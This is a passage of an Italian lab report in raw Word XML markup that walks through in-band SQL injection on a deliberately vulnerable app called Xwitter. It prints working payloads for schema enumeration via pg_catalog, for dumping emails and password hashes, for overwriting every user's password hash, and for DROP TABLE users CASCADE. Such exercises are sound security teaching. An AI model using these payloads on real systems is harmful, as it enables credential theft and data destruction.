      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nei log di rete la risposta è un array di User; il nome tabella resta nel campo username. Si ricavano così le tabelle dello schema public: users e posts.</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w:t>
              <w:br/>
              <w:t xml:space="preserve">    "id": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "username": "users",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "displayName": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "bio": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "createdAt": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "postCount": "0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  },</w:t>
              <w:br/>
              <w:t xml:space="preserve">  {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "id": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "username": "posts",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "displayName": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "bio": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "createdAt": "",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "postCount": "0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="__RefHeading___Toc196_3264099342"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
        <w:t>4.2 Nomi delle colonne della tabella users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nota la tabella users, si enumerano le colonne tramite pg_catalog.pg_attribute utilizzando la seguente SQL injection. Anche in questo caso il nome colonna è mappato sul campo username del DTO User.</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test' UNION ALL SELECT</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    a.attname AS column_name,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NULL</w:t>
              <w:br/>
              <w:t>FROM pg_catalog.pg_attribute a</w:t>
              <w:br/>
              <w:t>WHERE a.attrelid = 'public.users'::regclass</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND a.attnum &gt; 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND NOT a.attisdropped</w:t>
              <w:br/>
              <w:t xml:space="preserve">  AND '1' = '1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo modo si ottengono i nomi delle colonne di users, tra cui </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password_hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>che non erano incluse nella select originale relativa alla ricerca degli utenti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Con questi due passi si considera raggiunto l’obiettivo «raccogliere informazioni sulla struttura del DB o sulla sua configurazione».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="__RefHeading___Toc198_3264099342"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
        <w:t>5. Esfiltrazione dei dati</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A questo punto è possibile costruire una ulteriore SQL Injection con UNION per leggere gli hash delle password e le mail degli utenti selezionando le colonne segrete che sono state scoperte al passo precedente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>L’input seguente seleziona id, display_name, email, username e password_hash. In base all’ordine delle colonne riportato di seguito, abbiamo che:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>- la email dell’utente è riportata al posto del display_name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>- l’hash della password dell’utente è riportata al posto della bio</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test' UNION ALL SELECT id, display_name, email, password_hash, null FROM users WHERE '0' = '0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La tautologia '0' = '0, chiusa dall’apice del backend, fa sì che la UNION restituisca tutte le righe di users con email e password: resta così dimostrato l’obiettivo «esfiltrare dati contenuti in una o più tabelle del database» e la violazione della riservatezza (Confidentiality).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6. Modifica del contenuto del database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oltre alla Search user, anche la pagina Profile ha una vulnerabilità alle SQL injection, in particolare nella funzionalità di aggiornamento della bio dell’utente. Attraverso l’input utilizzato per modificare la bio, si dimostra che è possibile effettuare una SQL injection che modifica la bio e la password_hash relativa a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tutti gli utenti registrati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, compromettendo gravemente l’integrità dei dati del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1 Meccanismo dell'injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La query vulnerabile ha la forma:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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lineRule="auto" w:line="276" w:before="0" w:after="160"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>UPDATE users SET bio = '&lt;input&gt;' WHERE id = &lt;id&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Per effettuare l’attacco descritto, nel campo Bio della pagina Profile è stato inserito il seguente input:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>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1"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="288" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071"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ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>you have been hacked', password_hash = 'password_hacked'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Chiudendo la stringa con un apice e aggiungendo una seconda assegnazione, seguita da un commento di fine riga (--), il motore SQL esegue anche l'aggiornamento di password_hash. L'aggiornamento colpisce tutti gli utenti memorizzati nella tabella users perché il commento di fine riga rimuove totalmente la clausola WHERE che permetteva la modifica della bio solamente all’utente autenticato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Effetto osservato:  Nessun utente riesce più autenticarsi con la password precedente. Questo passo soddisfa l'obiettivo «modificare il contenuto del database» e illustra la violazione dell'integrità (Integrity) dei dati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>7. Cancellazione di una o più tabelle</w:t>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Sfruttando sempre la vulnerabilità della pagina di aggiornamento della bio, è inoltre possibile eseguire il drop di entrambe le tabelle posts e users, I cui nomi sono stati ricavati sfruttando la vulnerabilità del sistema alle SQL injection.</w:t>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Inserendo il seguente testo nella casella di aggiornamento della bio, è possibile eseguire il DROP della tabella users (e in cascade) di quella posts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>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1"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="288" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071"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ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>you have been hacked'; DROP TABLE IF EXISTS users CASCADE; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 xml:space="preserve">L'istruzione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DROP TABLE IF EXISTS users CASCADE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rimuove la tabella users. La clausola </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CASCADE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> è necessaria perché </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>posts.user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> referenzia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users(id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: con la clausola CASCADE PostgreSQL elimina quindi anche la tabella dipendente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>posts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>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Senza la tabella degli utenti, login, ricerca e pubblicazione dei post non hanno più una base su cui operare: il servizio diventa inutilizzabile. Questo passo soddisfa l'obiettivo «cancellare una o più tabelle» e completa la violazione della disponibilità (Availability), terza proprietà del modello CIA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>8. Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La simulazione in-band su Xwitter (applicazione vulnerabile alle SQL Injection) ha coperto l'intera traccia e ha violato le tre proprietà CIA. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La riservatezza (Confidentiality) cade con l'esfiltrazione di email e password_hash tramite UNION sulla Search user; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L'integrità (Integrity) con la seconda assegnazione iniettata nella UPDATE della bio, che riscrive password_hash; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La disponibilità (Availability) con il DROP TABLE di users, che rende l'applicazione inutilizzabile. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In sintesi risultano soddisfatti gli obiettivi richiesti: raccogliere informazioni sulla struttura del database o sulla sua configurazione (enumerazione di tabelle e colonne tramite information_schema e pg_catalog); esfiltrare dati contenuti in una o più tabelle (dump di users); modificare il contenuto del database, ad esempio i valori di un campo all'interno di una tabella (bio e password_hash); cancellare una o più tabelle (DROP TABLE IF EXISTS users CASCADE). </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId3"/>
      <w:footerReference w:type="default" r:id="rId4"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1417" w:right="1417" w:gutter="0" w:header="454" w:top="1247" w:footer="454"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Consolas">
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>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Fonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Pagina </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:t>8</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> di </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="444444"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="444444"/>
      </w:rPr>
      <w:t>8</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="44444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12" w:space="6" w:color="861F41"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9071" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="1871980" cy="550545"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="2"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2" descr=""/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1871980" cy="550545"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:color w:val="861F41"/>
